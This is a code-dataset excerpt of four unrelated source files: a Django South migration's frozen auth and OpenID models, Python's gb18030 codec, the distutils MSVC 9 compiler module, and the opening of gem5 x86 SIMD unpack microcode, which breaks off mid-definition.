'bronze': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_of_birth': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'email_isvalid': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'email_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'gold': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'gravatar': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'blank': 'True'}),
'hide_ignored_questions': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'questions_per_page': ('django.db.models.fields.SmallIntegerField', [], {'default': '10'}),
'real_name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'reputation': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'response_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'silver': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'w'", 'max_length': '2'}),
'tag_filter_setting': ('django.db.models.fields.CharField', [], {'default': "'ignored'", 'max_length': '16'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'django_authopenid.association': {
'Meta': {'object_name': 'Association'},
'assoc_type': ('django.db.models.fields.TextField', [], {'max_length': '64'}),
'handle': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issued': ('django.db.models.fields.IntegerField', [], {}),
'lifetime': ('django.db.models.fields.IntegerField', [], {}),
'secret': ('django.db.models.fields.TextField', [], {'max_length': '255'}),
'server_url': ('django.db.models.fields.TextField', [], {'max_length': '2047'})
},
'django_authopenid.externallogindata': {
'Meta': {'object_name': 'ExternalLoginData'},
'external_session_data': ('django.db.models.fields.TextField', [], {}),
'external_username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'})
},
'django_authopenid.nonce': {
'Meta': {'object_name': 'Nonce'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'salt': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'server_url': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'timestamp': ('django.db.models.fields.IntegerField', [], {})
},
'django_authopenid.userassociation': {
'Meta': {'unique_together': "(('user', 'provider_name'),)", 'object_name': 'UserAssociation'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'openid_url': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'provider_name': ('django.db.models.fields.CharField', [], {'default': "'unknown'", 'max_length': '64'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'django_authopenid.userpasswordqueue': {
'Meta': {'object_name': 'UserPasswordQueue'},
'confirm_key': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'new_password': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'})
}
}
complete_apps = ['django_authopenid']
| gpl-3.0 |
liamgh/liamgreenhughes-sl4a-tf101 | python/src/Lib/encodings/gb18030.py | 816 | 1031 | #
# gb18030.py: Python Unicode Codec for GB18030
#
# Written by Hye-Shik Chang <perky@FreeBSD.org>
#
import _codecs_cn, codecs
import _multibytecodec as mbc
codec = _codecs_cn.getcodec('gb18030')
class Codec(codecs.Codec):
encode = codec.encode
decode = codec.decode
class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,
codecs.IncrementalEncoder):
codec = codec
class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,
codecs.IncrementalDecoder):
codec = codec
class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):
codec = codec
class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):
codec = codec
def getregentry():
return codecs.CodecInfo(
name='gb18030',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
| apache-2.0 |
michalliu/OpenWrt-Firefly-Libraries | staging_dir/target-mipsel_1004kc+dsp_uClibc-0.9.33.2/usr/lib/python2.7/distutils/msvc9compiler.py | 148 | 31018 | """distutils.msvc9compiler
Contains MSVCCompiler, an implementation of the abstract CCompiler class
for the Microsoft Visual Studio 2008.
The module is compatible with VS 2005 and VS 2008. You can find legacy support
for older versions of VS in distutils.msvccompiler.
"""
# Written by Perry Stoll
# hacked by Robin Becker and Thomas Heller to do a better job of
# finding DevStudio (through the registry)
# ported to VS2005 and VS 2008 by Christian Heimes
__revision__ = "$Id$"
import os
import subprocess
import sys
import re
from distutils.errors import (DistutilsExecError, DistutilsPlatformError,
CompileError, LibError, LinkError)
from distutils.ccompiler import CCompiler, gen_lib_options
from distutils import log
from distutils.util import get_platform
import _winreg
RegOpenKeyEx = _winreg.OpenKeyEx
RegEnumKey = _winreg.EnumKey
RegEnumValue = _winreg.EnumValue
RegError = _winreg.error
HKEYS = (_winreg.HKEY_USERS,
_winreg.HKEY_CURRENT_USER,
_winreg.HKEY_LOCAL_MACHINE,
_winreg.HKEY_CLASSES_ROOT)
NATIVE_WIN64 = (sys.platform == 'win32' and sys.maxsize > 2**32)
if NATIVE_WIN64:
# Visual C++ is a 32-bit application, so we need to look in
# the corresponding registry branch, if we're running a
# 64-bit Python on Win64
VS_BASE = r"Software\Wow6432Node\Microsoft\VisualStudio\%0.1f"
VSEXPRESS_BASE = r"Software\Wow6432Node\Microsoft\VCExpress\%0.1f"
WINSDK_BASE = r"Software\Wow6432Node\Microsoft\Microsoft SDKs\Windows"
NET_BASE = r"Software\Wow6432Node\Microsoft\.NETFramework"
else:
VS_BASE = r"Software\Microsoft\VisualStudio\%0.1f"
VSEXPRESS_BASE = r"Software\Microsoft\VCExpress\%0.1f"
WINSDK_BASE = r"Software\Microsoft\Microsoft SDKs\Windows"
NET_BASE = r"Software\Microsoft\.NETFramework"
# A map keyed by get_platform() return values to values accepted by
# 'vcvarsall.bat'. Note a cross-compile may combine these (eg, 'x86_amd64' is
# the param to cross-compile on x86 targetting amd64.)
PLAT_TO_VCVARS = {
'win32' : 'x86',
'win-amd64' : 'amd64',
'win-ia64' : 'ia64',
}
class Reg:
"""Helper class to read values from the registry
"""
def get_value(cls, path, key):
for base in HKEYS:
d = cls.read_values(base, path)
if d and key in d:
return d[key]
raise KeyError(key)
get_value = classmethod(get_value)
def read_keys(cls, base, key):
"""Return list of registry keys."""
try:
handle = RegOpenKeyEx(base, key)
except RegError:
return None
L = []
i = 0
while True:
try:
k = RegEnumKey(handle, i)
except RegError:
break
L.append(k)
i += 1
return L
read_keys = classmethod(read_keys)
def read_values(cls, base, key):
"""Return dict of registry keys and values.
All names are converted to lowercase.
"""
try:
handle = RegOpenKeyEx(base, key)
except RegError:
return None
d = {}
i = 0
while True:
try:
name, value, type = RegEnumValue(handle, i)
except RegError:
break
name = name.lower()
d[cls.convert_mbcs(name)] = cls.convert_mbcs(value)
i += 1
return d
read_values = classmethod(read_values)
def convert_mbcs(s):
dec = getattr(s, "decode", None)
if dec is not None:
try:
s = dec("mbcs")
except UnicodeError:
pass
return s
convert_mbcs = staticmethod(convert_mbcs)
class MacroExpander:
def __init__(self, version):
self.macros = {}
self.vsbase = VS_BASE % version
self.load_macros(version)
def set_macro(self, macro, path, key):
self.macros["$(%s)" % macro] = Reg.get_value(path, key)
def load_macros(self, version):
self.set_macro("VCInstallDir", self.vsbase + r"\Setup\VC", "productdir")
self.set_macro("VSInstallDir", self.vsbase + r"\Setup\VS", "productdir")
self.set_macro("FrameworkDir", NET_BASE, "installroot")
try:
if version >= 8.0:
self.set_macro("FrameworkSDKDir", NET_BASE,
"sdkinstallrootv2.0")
else:
raise KeyError("sdkinstallrootv2.0")
except KeyError:
raise DistutilsPlatformError(
"""Python was built with Visual Studio 2008;
extensions must be built with a compiler than can generate compatible binaries.
Visual Studio 2008 was not found on this system. If you have Cygwin installed,
you can try compiling with MingW32, by passing "-c mingw32" to setup.py.""")
if version >= 9.0:
self.set_macro("FrameworkVersion", self.vsbase, "clr version")
self.set_macro("WindowsSdkDir", WINSDK_BASE, "currentinstallfolder")
else:
p = r"Software\Microsoft\NET Framework Setup\Product"
for base in HKEYS:
try:
h = RegOpenKeyEx(base, p)
except RegError:
continue
key = RegEnumKey(h, 0)
d = Reg.get_value(base, r"%s\%s" % (p, key))
self.macros["$(FrameworkVersion)"] = d["version"]
def sub(self, s):
for k, v in self.macros.items():
s = s.replace(k, v)
return s
def get_build_version():
"""Return the version of MSVC that was used to build Python.
For Python 2.3 and up, the version number is included in
sys.version. For earlier versions, assume the compiler is MSVC 6.
"""
prefix = "MSC v."
i = sys.version.find(prefix)
if i == -1:
return 6
i = i + len(prefix)
s, rest = sys.version[i:].split(" ", 1)
majorVersion = int(s[:-2]) - 6
minorVersion = int(s[2:3]) / 10.0
# I don't think paths are affected by minor version in version 6
if majorVersion == 6:
minorVersion = 0
if majorVersion >= 6:
return majorVersion + minorVersion
# else we don't know what version of the compiler this is
return None
def normalize_and_reduce_paths(paths):
"""Return a list of normalized paths with duplicates removed.
The current order of paths is maintained.
"""
# Paths are normalized so things like: /a and /a/ aren't both preserved.
reduced_paths = []
for p in paths:
np = os.path.normpath(p)
# XXX(nnorwitz): O(n**2), if reduced_paths gets long perhaps use a set.
if np not in reduced_paths:
reduced_paths.append(np)
return reduced_paths
def removeDuplicates(variable):
"""Remove duplicate values of an environment variable.
"""
oldList = variable.split(os.pathsep)
newList = []
for i in oldList:
if i not in newList:
newList.append(i)
newVariable = os.pathsep.join(newList)
return newVariable
def find_vcvarsall(version):
"""Find the vcvarsall.bat file
At first it tries to find the productdir of VS 2008 in the registry. If
that fails it falls back to the VS90COMNTOOLS env var.
"""
vsbase = VS_BASE % version
try:
productdir = Reg.get_value(r"%s\Setup\VC" % vsbase,
"productdir")
except KeyError:
productdir = None
# trying Express edition
if productdir is None:
vsbase = VSEXPRESS_BASE % version
try:
productdir = Reg.get_value(r"%s\Setup\VC" % vsbase,
"productdir")
except KeyError:
productdir = None
log.debug("Unable to find productdir in registry")
if not productdir or not os.path.isdir(productdir):
toolskey = "VS%0.f0COMNTOOLS" % version
toolsdir = os.environ.get(toolskey, None)
if toolsdir and os.path.isdir(toolsdir):
productdir = os.path.join(toolsdir, os.pardir, os.pardir, "VC")
productdir = os.path.abspath(productdir)
if not os.path.isdir(productdir):
log.debug("%s is not a valid directory" % productdir)
return None
else:
log.debug("Env var %s is not set or invalid" % toolskey)
if not productdir:
log.debug("No productdir found")
return None
vcvarsall = os.path.join(productdir, "vcvarsall.bat")
if os.path.isfile(vcvarsall):
return vcvarsall
log.debug("Unable to find vcvarsall.bat")
return None
def query_vcvarsall(version, arch="x86"):
"""Launch vcvarsall.bat and read the settings from its environment
"""
vcvarsall = find_vcvarsall(version)
interesting = set(("include", "lib", "libpath", "path"))
result = {}
if vcvarsall is None:
raise DistutilsPlatformError("Unable to find vcvarsall.bat")
log.debug("Calling 'vcvarsall.bat %s' (version=%s)", arch, version)
popen = subprocess.Popen('"%s" %s & set' % (vcvarsall, arch),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
stdout, stderr = popen.communicate()
if popen.wait() != 0:
raise DistutilsPlatformError(stderr.decode("mbcs"))
stdout = stdout.decode("mbcs")
for line in stdout.split("\n"):
line = Reg.convert_mbcs(line)
if '=' not in line:
continue
line = line.strip()
key, value = line.split('=', 1)
key = key.lower()
if key in interesting:
if value.endswith(os.pathsep):
value = value[:-1]
result[key] = removeDuplicates(value)
finally:
popen.stdout.close()
popen.stderr.close()
if len(result) != len(interesting):
raise ValueError(str(list(result.keys())))
return result
# More globals
VERSION = get_build_version()
if VERSION < 8.0:
raise DistutilsPlatformError("VC %0.1f is not supported by this module" % VERSION)
# MACROS = MacroExpander(VERSION)
class MSVCCompiler(CCompiler) :
"""Concrete class that implements an interface to Microsoft Visual C++,
as defined by the CCompiler abstract class."""
compiler_type = 'msvc'
# Just set this so CCompiler's constructor doesn't barf. We currently
# don't use the 'set_executables()' bureaucracy provided by CCompiler,
# as it really isn't necessary for this sort of single-compiler class.
# Would be nice to have a consistent interface with UnixCCompiler,
# though, so it's worth thinking about.
executables = {}
# Private class data (need to distinguish C from C++ source for compiler)
_c_extensions = ['.c']
_cpp_extensions = ['.cc', '.cpp', '.cxx']
_rc_extensions = ['.rc']
_mc_extensions = ['.mc']
# Needed for the filename generation methods provided by the
# base class, CCompiler.
src_extensions = (_c_extensions + _cpp_extensions +
_rc_extensions + _mc_extensions)
res_extension = '.res'
obj_extension = '.obj'
static_lib_extension = '.lib'
shared_lib_extension = '.dll'
static_lib_format = shared_lib_format = '%s%s'
exe_extension = '.exe'
def __init__(self, verbose=0, dry_run=0, force=0):
CCompiler.__init__ (self, verbose, dry_run, force)
self.__version = VERSION
self.__root = r"Software\Microsoft\VisualStudio"
# self.__macros = MACROS
self.__paths = []
# target platform (.plat_name is consistent with 'bdist')
self.plat_name = None
self.__arch = None # deprecated name
self.initialized = False
def initialize(self, plat_name=None):
# multi-init means we would need to check platform same each time...
assert not self.initialized, "don't init multiple times"
if plat_name is None:
plat_name = get_platform()
# sanity check for platforms to prevent obscure errors later.
ok_plats = 'win32', 'win-amd64', 'win-ia64'
if plat_name not in ok_plats:
raise DistutilsPlatformError("--plat-name must be one of %s" %
(ok_plats,))
if "DISTUTILS_USE_SDK" in os.environ and "MSSdk" in os.environ and self.find_exe("cl.exe"):
# Assume that the SDK set up everything alright; don't try to be
# smarter
self.cc = "cl.exe"
self.linker = "link.exe"
self.lib = "lib.exe"
self.rc = "rc.exe"
self.mc = "mc.exe"
else:
# On x86, 'vcvars32.bat amd64' creates an env that doesn't work;
# to cross compile, you use 'x86_amd64'.
# On AMD64, 'vcvars32.bat amd64' is a native build env; to cross
# compile use 'x86' (ie, it runs the x86 compiler directly)
# No idea how itanium handles this, if at all.
if plat_name == get_platform() or plat_name == 'win32':
# native build or cross-compile to win32
plat_spec = PLAT_TO_VCVARS[plat_name]
else:
# cross compile from win32 -> some 64bit
plat_spec = PLAT_TO_VCVARS[get_platform()] + '_' + \
PLAT_TO_VCVARS[plat_name]
vc_env = query_vcvarsall(VERSION, plat_spec)
# take care to only use strings in the environment.
self.__paths = vc_env['path'].encode('mbcs').split(os.pathsep)
os.environ['lib'] = vc_env['lib'].encode('mbcs')
os.environ['include'] = vc_env['include'].encode('mbcs')
if len(self.__paths) == 0:
raise DistutilsPlatformError("Python was built with %s, "
"and extensions need to be built with the same "
"version of the compiler, but it isn't installed."
% self.__product)
self.cc = self.find_exe("cl.exe")
self.linker = self.find_exe("link.exe")
self.lib = self.find_exe("lib.exe")
self.rc = self.find_exe("rc.exe") # resource compiler
self.mc = self.find_exe("mc.exe") # message compiler
#self.set_path_env_var('lib')
#self.set_path_env_var('include')
# extend the MSVC path with the current path
try:
for p in os.environ['path'].split(';'):
self.__paths.append(p)
except KeyError:
pass
self.__paths = normalize_and_reduce_paths(self.__paths)
os.environ['path'] = ";".join(self.__paths)
self.preprocess_options = None
if self.__arch == "x86":
self.compile_options = [ '/nologo', '/Ox', '/MD', '/W3',
'/DNDEBUG']
self.compile_options_debug = ['/nologo', '/Od', '/MDd', '/W3',
'/Z7', '/D_DEBUG']
else:
# Win64
self.compile_options = [ '/nologo', '/Ox', '/MD', '/W3', '/GS-' ,
'/DNDEBUG']
self.compile_options_debug = ['/nologo', '/Od', '/MDd', '/W3', '/GS-',
'/Z7', '/D_DEBUG']
self.ldflags_shared = ['/DLL', '/nologo', '/INCREMENTAL:NO']
if self.__version >= 7:
self.ldflags_shared_debug = [
'/DLL', '/nologo', '/INCREMENTAL:no', '/DEBUG', '/pdb:None'
]
self.ldflags_static = [ '/nologo']
self.initialized = True
# -- Worker methods ------------------------------------------------
def object_filenames(self,
source_filenames,
strip_dir=0,
output_dir=''):
# Copied from ccompiler.py, extended to return .res as 'object'-file
# for .rc input file
if output_dir is None: output_dir = ''
obj_names = []
for src_name in source_filenames:
(base, ext) = os.path.splitext (src_name)
base = os.path.splitdrive(base)[1] # Chop off the drive
base = base[os.path.isabs(base):] # If abs, chop off leading /
if ext not in self.src_extensions:
# Better to raise an exception instead of silently continuing
# and later complain about sources and targets having
# different lengths
raise CompileError ("Don't know how to compile %s" % src_name)
if strip_dir:
base = os.path.basename (base)
if ext in self._rc_extensions:
obj_names.append (os.path.join (output_dir,
base + self.res_extension))
elif ext in self._mc_extensions:
obj_names.append (os.path.join (output_dir,
base + self.res_extension))
else:
obj_names.append (os.path.join (output_dir,
base + self.obj_extension))
return obj_names
def compile(self, sources,
output_dir=None, macros=None, include_dirs=None, debug=0,
extra_preargs=None, extra_postargs=None, depends=None):
if not self.initialized:
self.initialize()
compile_info = self._setup_compile(output_dir, macros, include_dirs,
sources, depends, extra_postargs)
macros, objects, extra_postargs, pp_opts, build = compile_info
compile_opts = extra_preargs or []
compile_opts.append ('/c')
if debug:
compile_opts.extend(self.compile_options_debug)
else:
compile_opts.extend(self.compile_options)
for obj in objects:
try:
src, ext = build[obj]
except KeyError:
continue
if debug:
# pass the full pathname to MSVC in debug mode,
# this allows the debugger to find the source file
# without asking the user to browse for it
src = os.path.abspath(src)
if ext in self._c_extensions:
input_opt = "/Tc" + src
elif ext in self._cpp_extensions:
input_opt = "/Tp" + src
elif ext in self._rc_extensions:
# compile .RC to .RES file
input_opt = src
output_opt = "/fo" + obj
try:
self.spawn([self.rc] + pp_opts +
[output_opt] + [input_opt])
except DistutilsExecError, msg:
raise CompileError(msg)
continue
elif ext in self._mc_extensions:
# Compile .MC to .RC file to .RES file.
# * '-h dir' specifies the directory for the
# generated include file
# * '-r dir' specifies the target directory of the
# generated RC file and the binary message resource
# it includes
#
# For now (since there are no options to change this),
# we use the source-directory for the include file and
# the build directory for the RC file and message
# resources. This works at least for win32all.
h_dir = os.path.dirname(src)
rc_dir = os.path.dirname(obj)
try:
# first compile .MC to .RC and .H file
self.spawn([self.mc] +
['-h', h_dir, '-r', rc_dir] + [src])
base, _ = os.path.splitext (os.path.basename (src))
rc_file = os.path.join (rc_dir, base + '.rc')
# then compile .RC to .RES file
self.spawn([self.rc] +
["/fo" + obj] + [rc_file])
except DistutilsExecError, msg:
raise CompileError(msg)
continue
else:
# how to handle this file?
raise CompileError("Don't know how to compile %s to %s"
% (src, obj))
output_opt = "/Fo" + obj
try:
self.spawn([self.cc] + compile_opts + pp_opts +
[input_opt, output_opt] +
extra_postargs)
except DistutilsExecError, msg:
raise CompileError(msg)
return objects
def create_static_lib(self,
objects,
output_libname,
output_dir=None,
debug=0,
target_lang=None):
if not self.initialized:
self.initialize()
(objects, output_dir) = self._fix_object_args(objects, output_dir)
output_filename = self.library_filename(output_libname,
output_dir=output_dir)
if self._need_link(objects, output_filename):
lib_args = objects + ['/OUT:' + output_filename]
if debug:
pass # XXX what goes here?
try:
self.spawn([self.lib] + lib_args)
except DistutilsExecError, msg:
raise LibError(msg)
else:
log.debug("skipping %s (up-to-date)", output_filename)
def link(self,
target_desc,
objects,
output_filename,
output_dir=None,
libraries=None,
library_dirs=None,
runtime_library_dirs=None,
export_symbols=None,
debug=0,
extra_preargs=None,
extra_postargs=None,
build_temp=None,
target_lang=None):
if not self.initialized:
self.initialize()
(objects, output_dir) = self._fix_object_args(objects, output_dir)
fixed_args = self._fix_lib_args(libraries, library_dirs,
runtime_library_dirs)
(libraries, library_dirs, runtime_library_dirs) = fixed_args
if runtime_library_dirs:
self.warn ("I don't know what to do with 'runtime_library_dirs': "
+ str (runtime_library_dirs))
lib_opts = gen_lib_options(self,
library_dirs, runtime_library_dirs,
libraries)
if output_dir is not None:
output_filename = os.path.join(output_dir, output_filename)
if self._need_link(objects, output_filename):
if target_desc == CCompiler.EXECUTABLE:
if debug:
ldflags = self.ldflags_shared_debug[1:]
else:
ldflags = self.ldflags_shared[1:]
else:
if debug:
ldflags = self.ldflags_shared_debug
else:
ldflags = self.ldflags_shared
export_opts = []
for sym in (export_symbols or []):
export_opts.append("/EXPORT:" + sym)
ld_args = (ldflags + lib_opts + export_opts +
objects + ['/OUT:' + output_filename])
# The MSVC linker generates .lib and .exp files, which cannot be
# suppressed by any linker switches. The .lib files may even be
# needed! Make sure they are generated in the temporary build
# directory. Since they have different names for debug and release
# builds, they can go into the same directory.
build_temp = os.path.dirname(objects[0])
if export_symbols is not None:
(dll_name, dll_ext) = os.path.splitext(
os.path.basename(output_filename))
implib_file = os.path.join(
build_temp,
self.library_filename(dll_name))
ld_args.append ('/IMPLIB:' + implib_file)
self.manifest_setup_ldargs(output_filename, build_temp, ld_args)
if extra_preargs:
ld_args[:0] = extra_preargs
if extra_postargs:
ld_args.extend(extra_postargs)
self.mkpath(os.path.dirname(output_filename))
try:
self.spawn([self.linker] + ld_args)
except DistutilsExecError, msg:
raise LinkError(msg)
# embed the manifest
# XXX - this is somewhat fragile - if mt.exe fails, distutils
# will still consider the DLL up-to-date, but it will not have a
# manifest. Maybe we should link to a temp file? OTOH, that
# implies a build environment error that shouldn't go undetected.
mfinfo = self.manifest_get_embed_info(target_desc, ld_args)
if mfinfo is not None:
mffilename, mfid = mfinfo
out_arg = '-outputresource:%s;%s' % (output_filename, mfid)
try:
self.spawn(['mt.exe', '-nologo', '-manifest',
mffilename, out_arg])
except DistutilsExecError, msg:
raise LinkError(msg)
else:
log.debug("skipping %s (up-to-date)", output_filename)
def manifest_setup_ldargs(self, output_filename, build_temp, ld_args):
# If we need a manifest at all, an embedded manifest is recommended.
# See MSDN article titled
# "How to: Embed a Manifest Inside a C/C++ Application"
# (currently at http://msdn2.microsoft.com/en-us/library/ms235591(VS.80).aspx)
# Ask the linker to generate the manifest in the temp dir, so
# we can check it, and possibly embed it, later.
temp_manifest = os.path.join(
build_temp,
os.path.basename(output_filename) + ".manifest")
ld_args.append('/MANIFESTFILE:' + temp_manifest)
def manifest_get_embed_info(self, target_desc, ld_args):
# If a manifest should be embedded, return a tuple of
# (manifest_filename, resource_id). Returns None if no manifest
# should be embedded. See http://bugs.python.org/issue7833 for why
# we want to avoid any manifest for extension modules if we can)
for arg in ld_args:
if arg.startswith("/MANIFESTFILE:"):
temp_manifest = arg.split(":", 1)[1]
break
else:
# no /MANIFESTFILE so nothing to do.
return None
if target_desc == CCompiler.EXECUTABLE:
# by default, executables always get the manifest with the
# CRT referenced.
mfid = 1
else:
# Extension modules try and avoid any manifest if possible.
mfid = 2
temp_manifest = self._remove_visual_c_ref(temp_manifest)
if temp_manifest is None:
return None
return temp_manifest, mfid
def _remove_visual_c_ref(self, manifest_file):
try:
# Remove references to the Visual C runtime, so they will
# fall through to the Visual C dependency of Python.exe.
# This way, when installed for a restricted user (e.g.
# runtimes are not in WinSxS folder, but in Python's own
# folder), the runtimes do not need to be in every folder
# with .pyd's.
# Returns either the filename of the modified manifest or
# None if no manifest should be embedded.
manifest_f = open(manifest_file)
try:
manifest_buf = manifest_f.read()
finally:
manifest_f.close()
pattern = re.compile(
r"""<assemblyIdentity.*?name=("|')Microsoft\."""\
r"""VC\d{2}\.CRT("|').*?(/>|</assemblyIdentity>)""",
re.DOTALL)
manifest_buf = re.sub(pattern, "", manifest_buf)
pattern = "<dependentAssembly>\s*</dependentAssembly>"
manifest_buf = re.sub(pattern, "", manifest_buf)
# Now see if any other assemblies are referenced - if not, we
# don't want a manifest embedded.
pattern = re.compile(
r"""<assemblyIdentity.*?name=(?:"|')(.+?)(?:"|')"""
r""".*?(?:/>|</assemblyIdentity>)""", re.DOTALL)
if re.search(pattern, manifest_buf) is None:
return None
manifest_f = open(manifest_file, 'w')
try:
manifest_f.write(manifest_buf)
return manifest_file
finally:
manifest_f.close()
except IOError:
pass
# -- Miscellaneous methods -----------------------------------------
# These are all used by the 'gen_lib_options() function, in
# ccompiler.py.
def library_dir_option(self, dir):
return "/LIBPATH:" + dir
def runtime_library_dir_option(self, dir):
raise DistutilsPlatformError(
"don't know how to set runtime library search path for MSVC++")
def library_option(self, lib):
return self.library_filename(lib)
def find_library_file(self, dirs, lib, debug=0):
# Prefer a debugging library if found (and requested), but deal
# with it if we don't have one.
if debug:
try_names = [lib + "_d", lib]
else:
try_names = [lib]
for dir in dirs:
for name in try_names:
libfile = os.path.join(dir, self.library_filename (name))
if os.path.exists(libfile):
return libfile
else:
# Oops, didn't find it in *any* of 'dirs'
return None
# Helper methods for using the MSVC registry settings
def find_exe(self, exe):
"""Return path to an MSVC executable program.
Tries to find the program in several places: first, one of the
MSVC program search paths from the registry; next, the directories
in the PATH environment variable. If any of those work, return an
absolute path that is known to exist. If none of them work, just
return the original program name, 'exe'.
"""
for p in self.__paths:
fn = os.path.join(os.path.abspath(p), exe)
if os.path.isfile(fn):
return fn
# didn't find it; try existing path
for p in os.environ['Path'].split(';'):
fn = os.path.join(os.path.abspath(p),exe)
if os.path.isfile(fn):
return fn
return exe
| gpl-2.0 |
SteveXiSong/ECE757-SnoopingPredictions | src/arch/x86/isa/insts/simd128/floating_point/data_reordering/unpack_and_interleave.py | 91 | 3794 | # Copyright (c) 2007 The Hewlett-Packard Development Company
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black
microcode = '''
def macroop UNPCKLPS_XMM_XMM {
unpack xmmh, xmml, xmmlm, ext=1, size=4
unpack xmml, xmml, xmmlm, ext=0, size=4
};
def macroop UNPCKLPS_XMM_M {
ldfp ufp1, seg, sib, disp, dataSize=8
unpack xmmh, xmml, ufp1, ext=1, size=4
unpack xmml, xmml, ufp1, ext=0, size=4
};
def macroop UNPCKLPS_XMM_P {
rdip t7
ldfp ufp1, seg, riprel, disp, dataSize=8
unpack xmmh, xmml, ufp1, ext=1, size=4
unpack xmml, xmml, ufp1, ext=0, size=4
};
def macroop UNPCKLPD_XMM_XMM {
movfp xmmh, xmmlm
};
def macroop UNPCKLPD_XMM_M {
ldfp xmmh, seg, sib, disp, dataSize=8
};
def macroop UNPCKLPD_XMM_P {
rdip t7
